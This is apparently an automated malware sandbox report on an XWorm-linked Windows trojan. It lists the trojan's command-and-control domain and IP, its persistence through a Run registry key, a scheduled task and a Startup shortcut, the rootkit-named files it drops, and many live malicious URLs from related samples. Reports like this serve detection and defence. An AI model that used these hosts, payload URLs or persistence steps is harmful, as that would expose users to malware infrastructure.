                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                          147.185.221.21
                                                                                                                                                                          		subscribe-bond.gl.at.ply.ggUnited States
                                                                                                                                                                          		12087SALSGIVERUStrue

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                          Analysis ID:1539526
                                                                                                                                                                          Start date and time:2024-10-22 19:36:10 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 11m 38s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:22
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:22
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:aoKTzGQSRP.exe
                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                          Original Sample Name:202cb1021a1db9bd59a642ebee781bbafe284faf3fe1ba8e0ed1d89b3878ddbf.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@32/116@3/3
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 87.5%
                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Execution Graph export aborted for target 1.exe, PID 4828 because it is empty
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                          • VT rate limit hit for: aoKTzGQSRP.exe

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          13:37:18API Interceptor10x Sleep call for process: powershell.exe modified
                                                                                                                                                                          13:37:20API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                          13:37:20API Interceptor358222x Sleep call for process: DeadXClient.exe modified
                                                                                                                                                                          13:37:53API Interceptor324961x Sleep call for process: winlogon.exe modified
                                                                                                                                                                          13:37:55API Interceptor258306x Sleep call for process: lsass.exe modified
                                                                                                                                                                          13:37:56API Interceptor4426x Sleep call for process: svchost.exe modified
                                                                                                                                                                          13:37:58API Interceptor295024x Sleep call for process: dwm.exe modified
                                                                                                                                                                          13:38:09API Interceptor99x Sleep call for process: WMIADAP.exe modified
                                                                                                                                                                          13:38:13API Interceptor191x Sleep call for process: dllhost.exe modified
                                                                                                                                                                          19:37:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                          19:37:15Task SchedulerRun new task: Deadsvchost path: C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                          19:37:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                          19:37:31AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          208.95.112.17EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.30759.2179.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          76.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          4srUzubIrB.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          TfNX7EyrMg.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                          188.114.97.3Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                                                                                                                          request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                          • www.ergeneescortg.xyz/guou/
                                                                                                                                                                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.thetahostthe.top/9r5x/
                                                                                                                                                                          http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • servicetelemetryserver.shop/api/index.php
                                                                                                                                                                          ZP4KZDHVHWZZ2DC13DMX.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                          • tipinfodownload-soft1.com/g9jvjfd73/index.php
                                                                                                                                                                          aQdB62N7SB.elfGet hashmaliciousShikitega, XmrigBrowse
                                                                                                                                                                          • main.dsn.ovh/dns/loadbit
                                                                                                                                                                          PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.freedietbuilder.online/nnla/

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          ip-api.com7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.30759.2179.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          76.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          4srUzubIrB.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          TfNX7EyrMg.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          subscribe-bond.gl.at.ply.ggmIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.21

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          CLOUDFLARENETUSMlGBT3hUEG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.26.13.205
                                                                                                                                                                          cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 104.20.22.46
                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                          • 172.67.206.204
                                                                                                                                                                          with you.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 1.1.1.1
                                                                                                                                                                          https://rieg.riegriegrieg.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWJUZDBObUk9JnVpZD1VU0VSMDkxMDIwMjRVMTMxMDA5MTA=N0123NGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                          file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                          roba.txtGet hashmaliciousMeterpreter, ReflectiveLoaderBrowse
                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                          https://link.edgepilot.com/s/638b11ee/5PAE0D7rGEubgiw42RPNhQ?u=https://flow.wirtube.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 104.18.11.207
                                                                                                                                                                          #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                          https://www.gn3atrk.com/DRDPB6M/361N8SL9/?sub1=WoeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 172.64.151.101
                                                                                                                                                                          TUT-ASUS7EdXVD16wd.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          faBnX3uZqr.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          NxR7UQaeKe.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          yNDotZsd7U.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          MMsRQ2p7RL.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          rComprobantedepago_PAGOSBBVA_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          SecuriteInfo.com.Win32.MalwareX-gen.30759.2179.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          76.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          4srUzubIrB.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          TfNX7EyrMg.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                          SALSGIVERUSBWoiYc9WwI.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.22
                                                                                                                                                                          fjijTlM2tu.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.22
                                                                                                                                                                          SecuriteInfo.com.Trojan.DownLoad4.16832.13675.15683.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                                                          • 147.185.221.21
                                                                                                                                                                          gPEbJi1xiY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.22
                                                                                                                                                                          lx3vLwrX57.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.23
                                                                                                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 147.168.93.87
                                                                                                                                                                          file.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                          • 147.185.221.20
                                                                                                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 147.168.203.92
                                                                                                                                                                          MjrlHJvNyq.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.20
                                                                                                                                                                          r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                          • 147.185.221.18

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          No context

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Users\Public\DeadROOTkit.exemIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                            C:\Users\Public\DeadXClient.exemIURiU8n2P.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                              C:\Users\Public\DeadCodeRootKit.exemIURiU8n2P.exeGet hashmaliciousXWormBrowse

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DeadROOTkit.exe_e26246997b53dea36f71b8b6d6b7e7962ffb7e_a7d94592_aec0298f-fb29-462b-bfb4-0a8f2492fb46\Report.wer

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.204226742169756
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:0BvdpuBuS/SRh0NxMYaWj8iyU1lxPzuiFRZ24lO8Z:OyBugZNxMYa48iFxPzuiFRY4lO8Z
                                                                                                                                                                                MD5:41CD3D8B8E3A6DA04879F2DA1A67B87B
                                                                                                                                                                                SHA1:397EF2BD1F826529E6D7C12B1CC2EC77E4CAAE10
                                                                                                                                                                                SHA-256:CC3D59EEF00B05426D9045BE7595F3A37A55F60D2A51EBCA736D40C723454BC4
                                                                                                                                                                                SHA-512:235098B3C4F83DDE1CB6A5136725BF183814FFE6902FA1D574211B76EE1955B90C800EB52A59F24B5398BA2706F0D5DC2E304EBCBFD7090D827FF6897EF297D1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.0.9.2.2.3.5.5.9.7.4.1.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.0.9.2.2.3.7.6.9.1.1.6.3.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.c.0.2.9.8.f.-.f.b.2.9.-.4.6.2.b.-.b.f.b.4.-.0.a.8.f.2.4.9.2.f.b.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.d.0.8.a.8.c.-.6.d.6.a.-.4.b.b.d.-.a.2.d.3.-.3.5.3.5.a.5.9.7.0.2.4.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.D.e.a.d.R.O.O.T.k.i.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.e.a.d.R.O.O.T.k.i.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.5.c.-.0.0.0.1.-.0.0.1.5.-.2.3.0.a.-.4.2.0.5.a.9.2.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.3.1.7.3.c.6.f.e.7.3.b.2.c.c.a.5.d.c.5.1.6.1.7.c.a.d.2.9.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.0.4.9.7.e.e.0.4.5.2.2.6.b.2.d.3.1.0.c.7.6.7.8.e.d.0.5.5.e.e.e.d.b.c.8.8.d.c.7.7.!.D.e.a.d.R.O.O.

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD47D.tmp.dmp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                File Type:Mini DuMP crash report, 16 streams, Tue Oct 22 17:37:16 2024, 0x1205a4 type
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):439820
                                                                                                                                                                                Entropy (8bit):3.1179673963433907
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:ZD3KttLQrdIDPlDhTEyc6qOBb+3Q58bMuL53+svG7:FqcZWlDmyc6qOByQduZa7
                                                                                                                                                                                MD5:F93E1285E4E025BF3E9EC9876551E409
                                                                                                                                                                                SHA1:40DFA3AE793CCFE2C1DFB7A75451B434DB614F3B
                                                                                                                                                                                SHA-256:C60244A83127AD6B893B4744D47199B8AFB4A04D145C88201B2A7305F228E4F4
                                                                                                                                                                                SHA-512:ADA15999B0DBE6F985749FF45D949B6F8F79656EE7677ED425FBA077B0DDDBC696BC99F5254B63245CB7661185D22B6A3DFADFB9F2606C012354D5E697CB4BB1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:MDMP..a..... ..........g........................d...........<...((......0...d(.......7..r...........l.......8...........T............@..$u...........6...........8..............................................................................eJ.......9......Lw......................T.......\......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB16.tmp.WERInternalMetadata.xml

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):6738
                                                                                                                                                                                Entropy (8bit):3.7205420051588343
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:RSIU6o7wVetb78ed2IYZunhW0u5aMQUG89bHbWDXBf0J9jm:R6l7wVeJQerYZ+2pDG89b7Wdf0Jpm
                                                                                                                                                                                MD5:F9C21D8A6178D359F0F18601DEC24CDF
                                                                                                                                                                                SHA1:108519022E27BCB5C0DC0B846CD763501B369827
                                                                                                                                                                                SHA-256:80948BE366F4A3BBFC7CDE1116B980F86E336F261769D09ECBE45384366882E0
                                                                                                                                                                                SHA-512:B043100468387DF876F5394D691AFDB46F39069D15ABEF177BBE5106357A80BCDC69C240E1E255606F77D3E31CA639E72066094D854C86D5CF077A1ED125D675
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.8.8.<./.P.i.

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBE2.tmp.xml

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4771
                                                                                                                                                                                Entropy (8bit):4.45344538444456
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:cvIwWl8zsVJg771I9SdWpW8VYgYm8M4JC+PFhKyq8ve+3181vwd:uIjfvI7hs7VcJ4W91Kwd
                                                                                                                                                                                MD5:479957F8E41A6986DAFAEB4F6C10497C
                                                                                                                                                                                SHA1:047500529F1DCDFFF5FE7DAE671F086DA3F063DB
                                                                                                                                                                                SHA-256:64AFC4FE95EDD271112E645DB804AD4E867334BF64A817BD430F1F8B94A375B4
                                                                                                                                                                                SHA-512:35DB82A1996B9F67B08E4B4E273F00D77741B7BFE591D7B5AEC0EC3A9753BE051B57E355740A5BF45AD1775AA16B0FD0F4C270337C9AAB60D674C7CF1A26DCDF
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="554919" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBF0.tmp.csv

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):79178
                                                                                                                                                                                Entropy (8bit):3.0317011370766695
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:aj96yX6YcTi6CNN2amJQgPaOhH13g5O/0/bytgY+vKYCG:aj96yX6YcTi6CNN2amJQgPaOhH13g5Oc
                                                                                                                                                                                MD5:9B38365F201838020852611C4A6D0E2F
                                                                                                                                                                                SHA1:77BC118B37C70BFDF635673ED4421BEB3D7A6B61
                                                                                                                                                                                SHA-256:91FFBC10F1554F000D438087A95C729F938889C18FB41722A0D37DAFE497628B
                                                                                                                                                                                SHA-512:9FFE561EFB6F67E405D9D8B83492E0BF541BB0440145A9745DA12C3900787450E048178FCE1EE49B8985B5DAD749E8BBB0BB03B2FE7487CC359ED5D67FE98DFB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC4E.tmp.txt

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                Entropy (8bit):2.687252443040872
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:TiZYWd2GvI5eYxEYtWQ9HGYEZ/Ft8iEHFoSw2RKsIMa6RYMzJofIQ+3:2ZDFFsmMIjMa6RYMzJowQ+3
                                                                                                                                                                                MD5:407CE5A3186D7A9ADA8CAE9B544598DA
                                                                                                                                                                                SHA1:21BA2EA52BF47E8EAEA58FBEBCC1B7FE4B8E584B
                                                                                                                                                                                SHA-256:50845BDE8D5D362664B65877950E6711FBEE2B9DD8C8ED071388E88A826548C2
                                                                                                                                                                                SHA-512:1FA9D248D3FB161CF28DE19D11A6DB8268479BE9F94A514625B9C2CB1E46DEC2A7089B7FBE7D9AB79730BF179F5B0DA223D96EA5F51ADEEBADA7B4F38075C914
                                                                                                                                                                                Malicious:false
